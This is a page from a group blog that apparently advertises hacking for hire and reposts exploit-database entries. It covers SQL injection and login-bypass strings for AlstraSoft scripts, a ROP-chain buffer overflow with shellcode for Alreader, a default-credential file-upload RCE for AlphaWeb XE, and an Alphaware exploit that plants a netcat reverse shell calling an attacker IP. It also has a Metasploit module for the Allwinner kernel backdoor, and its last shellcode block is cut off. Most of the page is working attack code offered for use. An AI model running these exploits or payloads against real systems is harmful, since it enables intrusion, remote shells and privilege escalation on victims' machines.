Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108970

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# # # # # 
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
HireHackking 
source: https://www.securityfocus.com/bid/50350/info

Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. 

http://www.example.com/index.php?style=[LFI]%00
http://www.example.com/index.php?act=[LFI]%00
HireHackking 
#!/usr/bin/env python

#*************************************************************************************************************
# Exploit Title:          Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date:                   25.10.2015
# Category:               Local Exploit
# Exploit Author:         g00dv1n
# Contact:                g00dv1n.private@gmail.com
# Version:                2.5
# Tested on:              Windows XP SP3 / Windows 7 / Windows 8 
# Vendor Homepage:        http://www.alreader.com/index.php?lang=en
# Software Link (ENG):    http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU):     http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE: 



# Description:
# Alreader 2.5 its  free FB2 reader for Windows. 
# FB2 format its just XML. FB2 contain   <author> <first-name> </first-name>  </author>  block. 
# Overflow occurs if you create a long name of the author.
# App used WCHAR  (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41  -  00 41 00 41
# So We should use UTF-16. 
#
# Also, we can use single null byte in payload.
# 
# 
#
# Instructions:  
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload 
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP 
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
# 
# Program have Russian (RU) and English (Eng) versions. 
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs  arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload: 
#
#                              =-------------------------=
#                              |          gdvn           |        just fan magic bytes       
#                              |-------------------------|                         
#                              |                         |
#                              |   jmp from SEH adress   |        x 500    Spray Andress to Jump from oveeride SEH
#                              |                         |                        (ADD ESP, 808h RETN 4) 
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 500    Spray  ROP NOP (RETN)   
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       RU version        |
#                              |                         |
#                              |-------------------------|                         
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 250     Spray  ROP NOP (RETN) 
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |                         |
#                              |                         |
#                              |          Junk           |        'A' x 6000
#                              |                         |                         
#                              |                         |
#                              =-------------------------=
#
#
#
# 
#
#**************************************************************************************************************




#######################################################################################################
from struct import *

#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"


########################################################################################################

fuz_text  = ''                                # init fuzzy string 




jmp_to  = pack('<I',0x00442391 )              # 0x00442391 ADD ESP, 808h RETN 4

ret_NOP =  pack('<I',0x00448147 )             # RETN


##################################### START CREATE ROP CHAINs ############################################

fuz_text += 'gdvn'                              # magic init bytes



fuz_text += jmp_to * 500                        # spray adr



fuz_text += ret_NOP * 500                       # spray RETN adr



####################################### ROP CHAIN FOR RUS VERSION ########################################

# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC )     # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 )              # 0x0560944 ptr to unicode 'kernel32.dll'


#0x004904a6 :  #  POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x004904a6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b310d )              # 0x004b310d :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x004904A8 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9e9e )             # 0x004b9e9e :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b310d )             # 0x004b310d :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registrs for Virtual protect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489cdd )              # 0x00489cdd,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x004a6392 )              # 0x004a6392,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7d31 )              # 0x004e7d31,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc23c )              # 0x004fc23c,  # XOR EDX,EDX # RETN  # EDX = 0

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x0048c064 )              # 0x0048c064,  # POP ECX # RETN 

fuz_text += pack('<I',0x00629eea )              # 0x00629eea,  # &Writable location 

fuz_text += pack('<I',0x00487d6a )              # 0x00487d6a,  # POP EDI # RETN 

fuz_text += pack('<I',0x004f4401 )              # 0x004f4401,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004e6379 )              # 0x004e6379,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004f831c )          # ret adr  #  0x004f831c # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004ecfab )               # 0x004ecfab,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004a37bd )              # 0x004a37bd : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


##################################### END ROP CHAIN #########################################

#############################################################################################
#PASTE SHELLCODE HERE




# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");


fuz_text += shellcode


############################################################################################# 
fuz_text += ret_NOP * 250                       # spray RETN adr

#############################################################################################

############################### ROP CHAIN FOR ENG VERSION ###################################







# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C )     # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 )              # 0x00560724  ptr to unicode 'kernel32.dll'


#0x00488ed6 :  # POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x00488ed6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b3ded )              # 0x004b3ded :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x00488ed6 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9dfe )             # 0x004b9dfe :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b3ded )             # 0x004b3ded :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registrs for Virtual protect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489c3d )              # 0x00489c3d,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x00481c40 )              # 0x00481c40,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7c91 )              # 0x004e7c91,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc19c )              # 0x004fc19c,  # XOR EDX,EDX # RETN 

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x004f39dc )              # 0x004f39dc,  # POP ECX # RETN 

fuz_text += pack('<I',0x0062909d )              # 0x0062909d,  # &Writable location 

fuz_text += pack('<I',0x00495df4 )              # 0x00495df4,  # POP EDI # RETN 

fuz_text += pack('<I',0x00483a02 )              # 0x00483a02,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004fb3c6 )              # 0x004fb3c6,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004a8ee8 )          # ret adr  #  0x004a8ee8 # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004b3ded )               # 0x004b3ded,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004757a7  )              # 0x004757a7  : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


fuz_text += shellcode








##############################################################################################
fuz_text += '\x41' * 6000                       # final junk


################################ GENERATE utf-16 fb2 file ####################################

start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
  <description>
    <title-info>
      <author>
        <first-name> 
    '''

end   = '''
   <middle-name/>
        <last-name/>
      </author>
      <book-title>EXPLOIT TEST</book-title>
	 </title-info>
    </description>
</FictionBook>
'''
start_u = start.encode('utf-16')

end_u = end.encode('utf-16')

fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()

fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()

fout = open(file_result,'ab')
fout.write(end_u)
fout.close()


print "[*] File successfully created !!\n\n"
HireHackking 
# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
# Date: 2019-11-12
# Exploit Author: Mario Rodriguez
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1202.1711.04
# Tested on: Windows 10 Home x64 Spanish

#The Alps Pointing-device controller installs a service with an unquoted path
#which could be used as a local privilege escalation vulnerability. To exploit this vulnerability,
#an executable file could be placed in the path of the service and after rebooting the system or
#restarting the service the malicious code will be executed with elevated privileges.

#Step to discover the vulnerability

C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Alps HID Monitor Service    ApHidMonitorService     C:\Program Files\Apoint2K\HidMonitorSvc.exe     Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Alps HID Monitor Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
# Date: 2019-11-07
# Exploit Author: Héctor Gabriel Chimecatl Hernández
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1.0.10
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Service info:

Alps HID Monitor Service	ApHidMonitorService	C:\Program Files\Apoint2K\HidMonitorSvc.exe	Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Alps HID Monitor Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Reference: https://github.com/ricardojoserf/CVE-2021-40845

import requests
import base64
import argparse

# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
	parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	base_url = args.url
	url_main =   base_url + "/php/index.php"
	url_upload = base_url + "/php/script_uploads.php"

	command = args.command
	uploaded_file = "poc.php"
	url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command

	login_authorization =  "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
	upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))

	headers_login = {
		"Authorization": login_authorization,
		"Cache-Control": "max-age=0"
	}

	headers_upload = {
		'Authorization': upload_authorization,
		'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
		'sec-ch-ua-mobile': '?0',
		'Upgrade-Insecure-Requests': '1',
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
		'Sec-Fetch-Site': 'same-origin',
		'Sec-Fetch-Mode': 'navigate',
		'Sec-Fetch-User': '?1',
		'Sec-Fetch-Dest': 'iframe',
		'Accept-Encoding': 'gzip, deflate',
		'Accept-Language': 'en-US,en;q=0.9',
	}

	files = {
		"userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
	}

	s = requests.session()
	# Login as admin
	s.get(url_main, headers = headers_login)
	# Upload file
	upload = s.post(url_upload, files=files, headers = headers_upload)
	# Execute command
	cmd = s.post(url_cmd)
	print(cmd.text.replace("<pre>","").replace("</pre>",""))


if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
# Date: 15-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description --- #

# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.

# --- Proof of concept --- #

#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
  random_number = str(random.randint(100000000,999999999))
  file_name = "SHELL.php"
  revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
  m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
  print("(+) Uploading php reverse shell file ..")
  r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
  return random_number

def trigger_shell_sqli(target_ip,product_id):
  target_file_name = ''
  url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
  print("(+) Now setting up our sqli for file name guessing ..")

  # STEP 1: Get length of target column in database ..
  for i in range(1, 200):
    payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
    r2 = requests.post(url, data=payload, allow_redirects=False)

    # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
    if str(r2.status_code) == '302':
      print("(+) Initial sqli successful, got length of our target file name!")
      print("(+) Now for the filename.. ", end = '')
      for j in range(1, i+1):
        for brutechar in range(32, 126):
          payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
          r3 = requests.post(url, data=payload, allow_redirects=False)
          if str(r3.status_code) == '302':
            target_file_name = target_file_name + chr(brutechar)
            print(chr(brutechar), end = '')
            sys.stdout.flush()
            break

  url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
  print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
  r4 = requests.get(url)

def main():
  if len(sys.argv) != 4:
    print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
    print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
    sys.exit(-1)

  target_ip = sys.argv[1]
  attacker_ip = sys.argv[2]
  attacker_port = sys.argv[3]

  product_id = file_upload(target_ip, attacker_ip, attacker_port)
  trigger_shell_sqli(target_ip, product_id)

  print("(+) done!")

if __name__ == "__main__":
  main()
HireHackking 
source: https://www.securityfocus.com/bid/62036/info

Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
        "Description"    => %q{
          This module attempts to exploit a debug backdoor privilege escalation in
          Allwinner SoC based devices.
          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
          Vulnerable OS: all OS images available for Orange Pis,
                         any for FriendlyARM's NanoPi M1,
                         SinoVoip's M2+ and M3,
                         Cuebietech's Cubietruck +
                         Linksprite's pcDuino8 Uno
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
        },
        "License"        => MSF_LICENSE,
        "Author"         =>
          [
            "h00die <mike@stcyrsecurity.com>",  # Module
            "KotCzarny"                         # Discovery
          ],
        "Platform"       => [ "android", "linux" ],
        "DisclosureDate" => "Apr 30 2016",
        "DefaultOptions" => {
          "payload" => "linux/armle/mettle/reverse_tcp"
        },
        "Privileged"     => true,
        "Arch"           => ARCH_ARMLE,
        "References"     =>
          [
            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
                     "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
          ],
        "SessionTypes"   => [ "shell", "meterpreter" ],
        'Targets'        =>
          [
            [ 'Auto',           { } ]
          ],
        'DefaultTarget'  => 0,
      ))
  end

  def check
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      pl = generate_payload_exe

      exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
      vprint_good "Backdoor Found, writing payload to #{exe_file}"
      write_file(exe_file, pl)
      cmd_exec("chmod +x #{exe_file}")

      vprint_good 'Escalating'
      cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
    else
      print_error "Backdoor #{backdoor} not found."
    end
  end
end
HireHackking 
#!/usr/bin/python
# Tested on: Windows 10 Professional (x86)
# Exploit for previous version: https://www.exploit-db.com/exploits/42455/ (Seems they haven't patched the vulnerability at all :D)

# msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode =  ""
shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x5a\x48\x33\x52"
shellcode += "\x69\x70\x69\x70\x6d\x30\x31\x50\x53\x59\x79\x55\x30"
shellcode += "\x31\x75\x70\x6f\x74\x72\x6b\x42\x30\x6e\x50\x52\x6b"
shellcode += "\x4e\x72\x7a\x6c\x52\x6b\x4e\x72\x6a\x74\x44\x4b\x71"
shellcode += "\x62\x6c\x68\x7a\x6f\x34\x77\x50\x4a\x6f\x36\x30\x31"
shellcode += "\x4b\x4f\x74\x6c\x6d\x6c\x43\x31\x63\x4c\x7a\x62\x6e"
shellcode += "\x4c\x4d\x50\x47\x51\x66\x6f\x6c\x4d\x79\x71\x55\x77"
shellcode += "\x68\x62\x6a\x52\x31\x42\x31\x47\x42\x6b\x6e\x72\x6c"
shellcode += "\x50\x64\x4b\x30\x4a\x4d\x6c\x62\x6b\x6e\x6c\x4c\x51"
shellcode += "\x63\x48\x5a\x43\x6f\x58\x4b\x51\x48\x51\x72\x31\x62"
shellcode += "\x6b\x71\x49\x4d\x50\x59\x71\x46\x73\x72\x6b\x6e\x69"
shellcode += "\x7a\x78\x48\x63\x6c\x7a\x61\x39\x44\x4b\x6c\x74\x64"
shellcode += "\x4b\x4b\x51\x37\x66\x70\x31\x69\x6f\x54\x6c\x39\x31"
shellcode += "\x46\x6f\x5a\x6d\x79\x71\x58\x47\x4f\x48\x69\x50\x53"
shellcode += "\x45\x6c\x36\x6d\x33\x43\x4d\x49\x68\x6d\x6b\x61\x6d"
